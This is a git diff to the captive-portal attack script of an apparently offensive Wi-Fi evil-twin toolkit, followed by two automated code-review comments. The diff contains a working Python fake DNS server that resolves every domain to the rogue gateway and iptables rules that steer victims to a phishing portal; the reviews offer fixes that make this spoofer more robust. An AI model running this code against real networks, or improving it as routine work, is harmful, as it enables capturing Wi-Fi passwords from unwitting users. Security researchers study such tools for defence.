diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh
index 2d49fd8..e859175 100755
--- a/attacks/Captive Portal/attack.sh
+++ b/attacks/Captive Portal/attack.sh
@@ -711,48 +711,53 @@ index-file.names = ( # Create a DNS service with python, forwarding all traffic to gateway. echo "\ +#!/usr/bin/env python2 +# -*- coding: utf-8 -*- + import socket + class DNSQuery: - def __init__(self, data): - self.data=data - self.dominio='' + def __init__(self, data): + self.data=data + self.dominio='' - tipo = (ord(data[2]) >> 3) & 15 - if tipo == 0: - ini=12 - lon=ord(data[ini]) - while lon != 0: - self.dominio+=data[ini+1:ini+lon+1]+'.' - ini+=lon+1 - lon=ord(data[ini]) + tipo = (ord(data[2]) >> 3) & 15 + if tipo == 0: + ini=12 + lon=ord(data[ini]) + while lon != 0: + self.dominio+=data[ini + 1:ini + lon + 1] + '.' + ini += lon + 1 + lon=ord(data[ini]) + + def respuesta(self, ip): + packet='' + if self.dominio: + packet+=self.data[:2] + '\x81\x80' + packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' + packet+=self.data[12:] + packet+='\xc0\x0c' + packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' + packet+=str.join('', map(lambda x: chr(int(x)), ip.split('.'))) + return packet - def respuesta(self, ip): - packet='' - if self.dominio: - packet+=self.data[:2] + \"\x81\x80\" - packet+=self.data[4:6] + self.data[4:6] + '\x00\x00\x00\x00' - packet+=self.data[12:] - packet+='\xc0\x0c' - packet+='\x00\x01\x00\x01\x00\x00\x00\x3c\x00\x04' - packet+=str.join('',map(lambda x: chr(int(x)), ip.split('.'))) - return packet if __name__ == '__main__': - ip='$CaptivePortalGatewayAddress' - print 'pyminifakeDwebconfNS:: dom.query. 60 IN A %s' % ip + ip='$CaptivePortalGatewayAddress' + print 'pyminifakeDwebconfNS:: dom.query. 
60 IN A %s' % ip - udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - udps.bind(('',53)) + udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + udps.bind((ip, 53)) - try: - while 1: - data, addr = udps.recvfrom(1024) - p=DNSQuery(data) - udps.sendto(p.respuesta(ip), addr) - print 'Request: %s -> %s' % (p.dominio, ip) - except KeyboardInterrupt: - print 'Finalizando' + try: + while True: + data, addr = udps.recvfrom(1024) + p=DNSQuery(data) + udps.sendto(p.respuesta(ip), addr) + print 'Request: %s -> %s' % (p.dominio, ip) + except KeyboardInterrupt: + print 'Finalizando' udps.close()\ " >"$FLUXIONWorkspacePath/fluxion_captive_portal_dns.py" @@ -1090,8 +1095,7 @@ captive_portal_unset_routes() { ip addr del $CaptivePortalGatewayAddress/24 dev $CaptivePortalAccessInterface 2>/dev/null } -# Set up DHCP / WEB server -# Set up DHCP / WEB server +# Set up DHCP / WEB server / DNS Firewall captive_portal_set_routes() { # Give an address to the gateway interface in the rogue network. # This makes the interface accessible from the rogue network. @@ -1107,15 +1111,10 @@ captive_portal_set_routes() { iptables --table nat --flush iptables --delete-chain iptables --table nat --delete-chain - iptables -P FORWARD ACCEPT - - iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT \ - --to-destination $CaptivePortalGatewayAddress:80 - iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT \ - --to-destination $CaptivePortalGatewayAddress:443 - iptables -A INPUT -p tcp --sport 443 -j ACCEPT - iptables -A OUTPUT -p tcp --dport 443 -j ACCEPT - iptables -t nat -A POSTROUTING -j MASQUERADE + iptables -A INPUT -p tcp --dport 443 -j ACCEPT + iptables -A INPUT -p tcp --dport 80 -j ACCEPT + iptables -A INPUT -p udp --dport 53 -j ACCEPT + iptables -A INPUT -p udp --dport 67 -j ACCEPT } captive_portal_stop_interface() {
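Review bot: `DNSQuery.__init__` in the generated Python script still indexes `data[2]` and `data[ini]` with no length check, and the receive loop catches only `KeyboardInterrupt`, so a single truncated or malformed datagram ends the process with an uncaught `IndexError`. Treat the datagram as untrusted input and guard the per-packet parse in the loop, for example `try: p=DNSQuery(data)` followed by `except IndexError: continue`. Because the exception skips it, `udps.close()` after the `try` block is also never reached on that path; a `finally:` clause would cover it. Separately, the new shebang pins the script to `python2`, which is end-of-life and absent from many current distributions, while the body keeps `print` statements and `str`-based packet building that will not run under Python 3. A one-line comment above the `echo` stating which interpreter the generated file requires would help.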
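Review bot: The four added `iptables -A INPUT ... -j ACCEPT` rules in the last hunk only take effect if the INPUT policy is DROP or a later rule rejects traffic, and nothing visible in this hunk sets a policy after the flush. The start of `captive_portal_set_routes` is outside the hunk, so a policy may be set there. If the goal is the "DNS Firewall" named in the new comment, state it explicitly with `iptables -P INPUT DROP`, preceded by accepts for loopback and established traffic. Since this commit drops `iptables -P FORWARD ACCEPT`, also add `iptables -P FORWARD DROP`, because a flush does not reset a policy left at ACCEPT by an earlier run. The function also discards the host's existing rule set, and whether that is saved and restored elsewhere is not visible here.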